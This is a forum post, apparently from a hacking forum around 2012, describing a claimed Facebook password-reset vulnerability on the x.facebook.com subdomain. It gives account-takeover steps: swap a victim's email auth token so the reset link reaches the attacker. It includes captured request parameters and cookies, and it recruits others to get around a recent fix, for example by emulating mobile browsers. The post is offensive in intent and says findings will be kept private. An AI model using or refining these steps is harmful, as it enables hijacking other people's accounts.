Possible Facebook Vlun

1 reply [Last post]
Joined: 2012/01/15

Hi, I found a facebook vulnerability from a Turk guy.. the vulnerability is that if you use a domain level other than www.facebook.com (Example x.facebook.com) the information for the password reminder page is handled otherwise and one could TAMPER THE EMAIL AUTH DATA to send the confirmation email to the attackers emails and this link-page doesn't check for previous passwords so one could change the password and log in without any further due.

But the attacker must know the victims email address and the worst of all is that they have updated this function since new year so that the handlers maybe? check the token packets twice, I need some help more people = more changes to crack something, they changed the GET function from what I understand and they changed the confirmation script url to hex code?..

This vulnerability isn't popular at all .. so I'm thinking that they didn't mind to sanitize the code enough to prevend further exploits.

REFERER:        <a href="http://x.facebook.com/recover?cuid=AYgN0SgNxgW2gyg-8HgNZ53Cvj5RdK7V7-XXXn_GIk-TYiDlcPthoxSUA-P2d81d7rqGaa_N42VBzYzpaguuGBazBPUUoyGDUBD7YYkhoRNm37SUrL9LvhRh-FX6PetxpYpd5huCZD3c4_RXWhu_hDp0l1n7PEICkppMSK1-gxLFmw&refsrc=http%3A%2F%2Fx.facebook.com%2Frecover&refid=0&_rdr<br />
COOKIE:" title="http://x.facebook.com/recover?cuid=AYgN0SgNxgW2gyg-8HgNZ53Cvj5RdK7V7-XXXn_GIk-TYiDlcPthoxSUA-P2d81d7rqGaa_N42VBzYzpaguuGBazBPUUoyGDUBD7YYkhoRNm37SUrL9LvhRh-FX6PetxpYpd5huCZD3c4_RXWhu_hDp0l1n7PEICkppMSK1-gxLFmw&refsrc=http%3A%2F%2Fx.facebook.com%2Frecover&refid=0&_rdr<br />
COOKIE:">http://x.facebook.com/recover?cuid=AYgN0SgNxgW2gyg-8HgNZ53Cvj5RdK7V7-XXX...</a>        datr=RBsUT7FrOTTh_8JqLs5WYnke; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F; lsd=LOuM6; m_ts=1326719401; L=2; reg_fb_ref=http%3A%2F%2Fx.facebook.com%2Frecover%3Fcuid%3DAYg4ZfAfedOw7TT_BUj6hKdk1zZTnHulCYjbO8yNLQMQNN6sAflr0uctssfHlsx8M4nM-Fpgn_VuyCM4r7OkEwTjxFiCVAjEOkA9C3T0ZC4Q1PhtfbSjX5ozNgR9M2Xp6IZD4uVzWmS4ifRACfyEDlSvI31zlKV9-1RDdbqRR7Gxiw%26s%3D100%26referer%3Dhttp%253A%252F%252Fx.facebook.com%252Flogin%252Fhelp%252Fidentify%252F%253Fselect_user_url%253D%25252Frecover%2526no_selection_url%253D%25252Fhelp%25252Fcontact.php%25253Fshow_form%25253Dcannot_identify%252526flow%25253Dpw_reset%2526instructions%253Dpassword_reset%2526flow%253Dpw_reset%2526skip_confirmation%253D1%2526refid%253D0%26refid%3D0; W=1326719429; i_id=%3Aasync_conf; sfiu=AYhFUajIX5kqTZc4rD5zdb5Ri7DaNwTXI0okem5R-8UeD17DcmskH82_T89aX8PrCFSchy0rfasQlU4nbt-1CRfrR3ITeCNhsM6_ge-RxD6wf1xR-I2H2JV9LHGy_BeOF0sKEiAr7uQtPaG6T16bhfUli3ggj7NTKkJ4EsRLAEBVFw
LSD:    LOuM6
POSTID: cda97d47228e889ffc3bd811513b4a0e
CHARSET:        %E2%82%AC%2C%C2%B4%2C%E2%82%AC%2C%C2%B4%2C%E6%B0%B4%2C%D0%94%2C%D0%84
EMAIL AUTH:     AYgQ7G_APrmuZFhmHzRx5PFD-WW8O6R4jOb0-I_tJn0FWcR1EvW3aPid6Fj90fGc2D1FuyiFdisBX8SnL5jYjvZ6
CONFIRMATION (do_send_code):    %CE%95%CF%80%CE%B1%CE%BD%CE%B1%CF%86%CE%BF%CF%81%CE%AC+%CE%BA%CF%89%CE%B4%CE%B9%CE%BA%CE%BF%CF%8D+%CF%80%CF%81%CF%8C%CF%83%CE%B2%CE%B1%CF%83%CE%B7%CF%82

Before they patch it you could pretend that you are the victim asking to reset the password using email and when you send the data over change the victims EMAIL AUTH TOKEN with the attacker EMAIL AUTH TOKEN and the link would be sent to the attackers email so he could change the password. They don't check anything else if one could get a hold of this link he could steal the victims account.

Don't leech.


[size="5"]They are using [color="#8B0000"]dynamic cookies[/color] .. this must be what they have changed. If someone wants to work on this..post here your findings.[/size]

[color="#FF0000"]If one finds something it's going private.[/color]

UPDATE: I thought that if they didn't properly sanitize data before on x.facebook.com how about testing other domain levels *.facebook.com for the same vulnerability and I know that most mobiles browsers don't use dynamic cookies and I remember if I log from an old mobile they use a different code from scratch not only different layout because the old mobile browsers have compatibility issues.

Use the mobiles HTTP REFERRER ?? emulate mobile environment?? How about WAN traffic it's different from GPRS..

Change mobiles OS and tamper data from it! ( I know about booting a mobile with backtrack but the WIFI doesn't work yet. )